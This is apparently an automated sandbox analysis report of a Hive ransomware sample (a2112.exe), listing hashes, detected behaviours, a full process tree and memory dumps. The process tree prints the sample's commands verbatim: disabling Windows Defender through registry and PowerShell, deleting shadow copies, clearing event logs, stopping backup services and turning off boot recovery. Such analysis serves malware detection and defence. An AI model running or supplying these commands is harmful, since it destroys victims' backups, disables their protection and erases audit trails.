Analysis

  • max time kernel
    142s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    03-08-2021 01:31

General

  • Target

    a2112.exe

  • Size

    919KB

  • MD5

    4cd42e7aac7f89edf5764b699b2800d0

  • SHA1

    f309daa9650485d6ef6ceeccdc8c014d425a00fd

  • SHA256

    67ab2abe18b060275763e1d0c73d27c1e61b69097232ed9d048d41760a4533ef

  • SHA512

    0dcf0a9f4b15a355c3da11fbcd2276e9d96bd7b767c3cc2cdf17e3fc0b47483f3ef7f6953fd0ca232c3e9a8603be34b0f6c9d41eaac32ffff66755d8d2400440

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Stops running service(s) 3 TTPs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2112.exe
    "C:\Users\Admin\AppData\Local\Temp\a2112.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\system32\cmd.exe
      cmd /c bB9B1encv6.bat >NUL 2>NUL
      2⤵
        PID:840
      • C:\Windows\system32\cmd.exe
        cmd /c bB9B1encv6.bat >NUL 2>NUL
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:848
        • C:\Windows\system32\sc.exe
          sc stop "LanmanWorkstation"
          3⤵
            PID:1676
          • C:\Windows\system32\sc.exe
            sc stop "NetMsmqActivator"
            3⤵
              PID:760
            • C:\Windows\system32\sc.exe
              sc stop "SamSs"
              3⤵
                PID:656
              • C:\Windows\system32\sc.exe
                sc stop "SDRSVC"
                3⤵
                  PID:784
                • C:\Windows\system32\sc.exe
                  sc stop "SstpSvc"
                  3⤵
                    PID:288
                  • C:\Windows\system32\sc.exe
                    sc stop "UI0Detect"
                    3⤵
                      PID:1156
                    • C:\Windows\system32\sc.exe
                      sc stop "VSS"
                      3⤵
                        PID:932
                      • C:\Windows\system32\sc.exe
                        sc stop "wbengine"
                        3⤵
                          PID:292
                        • C:\Windows\system32\sc.exe
                          sc stop "WebClient"
                          3⤵
                            PID:1168
                          • C:\Windows\system32\sc.exe
                            sc delete "LanmanWorkstation"
                            3⤵
                              PID:964
                            • C:\Windows\system32\sc.exe
                              sc delete "NetMsmqActivator"
                              3⤵
                                PID:752
                              • C:\Windows\system32\sc.exe
                                sc delete "SamSs"
                                3⤵
                                  PID:112
                                • C:\Windows\system32\sc.exe
                                  sc delete "SDRSVC"
                                  3⤵
                                    PID:1492
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SstpSvc"
                                    3⤵
                                      PID:1588
                                    • C:\Windows\system32\sc.exe
                                      sc delete "UI0Detect"
                                      3⤵
                                        PID:1396
                                      • C:\Windows\system32\sc.exe
                                        sc delete "VSS"
                                        3⤵
                                          PID:692
                                        • C:\Windows\system32\sc.exe
                                          sc delete "wbengine"
                                          3⤵
                                            PID:1252
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WebClient"
                                            3⤵
                                              PID:1736
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                              3⤵
                                                PID:1844
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                3⤵
                                                  PID:2004
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                  3⤵
                                                    PID:1576
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                    3⤵
                                                      PID:1696
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                      3⤵
                                                        PID:1360
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                        3⤵
                                                          PID:1200
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                          3⤵
                                                            PID:1420
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                            3⤵
                                                              PID:844
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                              3⤵
                                                                PID:1636
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                3⤵
                                                                  PID:1704
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                  3⤵
                                                                    PID:764
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                    3⤵
                                                                      PID:240
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                      3⤵
                                                                        PID:656
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                        3⤵
                                                                          PID:268
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                          3⤵
                                                                            PID:1120
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                            3⤵
                                                                              PID:1584
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                              3⤵
                                                                                PID:1620
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                3⤵
                                                                                  PID:904
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                  3⤵
                                                                                    PID:828
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                    3⤵
                                                                                      PID:1064
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                      3⤵
                                                                                        PID:524
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                        3⤵
                                                                                          PID:752
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                          3⤵
                                                                                            PID:584
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                            3⤵
                                                                                              PID:552
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                              3⤵
                                                                                                PID:1968
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                3⤵
                                                                                                  PID:1588
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  3⤵
                                                                                                    PID:1924
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    3⤵
                                                                                                      PID:1332
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                      3⤵
                                                                                                        PID:1916
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                        3⤵
                                                                                                          PID:1252
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                          3⤵
                                                                                                          • Modifies security service
                                                                                                          PID:344
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                          3⤵
                                                                                                            PID:872
                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                            vssadmin delete shadows /all /quiet
                                                                                                            3⤵
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:1904
                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                            wevtutil cl system
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1592
                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                            wevtutil cl security
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1200
                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                            wevtutil cl application
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1232
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic SHADOWCOPY /nointeractive
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:804
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic shadowcopy delete
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1856
                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                            bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                            3⤵
                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                            PID:632
                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                            bcdedit /set {default} recoveryenabled no
                                                                                                            3⤵
                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                            PID:1168
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                            3⤵
                                                                                                              PID:1032
                                                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                4⤵
                                                                                                                • Deletes Windows Defender Definitions
                                                                                                                PID:1064
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                              3⤵
                                                                                                                PID:1480
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                                  4⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:540
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                3⤵
                                                                                                                  PID:1904
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                    4⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:1932
                                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\fwdM_HOW_TO_DECRYPT.txt
                                                                                                              1⤵
                                                                                                              • Opens file in notepad (likely ransom note)
                                                                                                              PID:1420

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v6

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • memory/540-151-0x000000001AA60000-0x000000001AA61000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-132-0x0000000002560000-0x0000000002561000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-131-0x000000001AB70000-0x000000001AB71000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-130-0x00000000022E0000-0x00000000022E1000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-134-0x000000001AAF4000-0x000000001AAF6000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/540-135-0x0000000002590000-0x0000000002591000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-136-0x0000000002650000-0x0000000002651000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-139-0x000000001A980000-0x000000001A981000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/540-133-0x000000001AAF0000-0x000000001AAF2000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/540-152-0x000000001AA70000-0x000000001AA71000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1592-116-0x000007FEFC4D1000-0x000007FEFC4D3000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1932-160-0x000000001AB94000-0x000000001AB96000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1932-159-0x000000001AB90000-0x000000001AB92000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1932-158-0x0000000002570000-0x0000000002571000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1932-157-0x0000000002610000-0x0000000002611000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1932-156-0x000000001AC10000-0x000000001AC11000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1932-155-0x0000000002350000-0x0000000002351000-memory.dmp

                                                                                                              Filesize

                                                                                                              4KB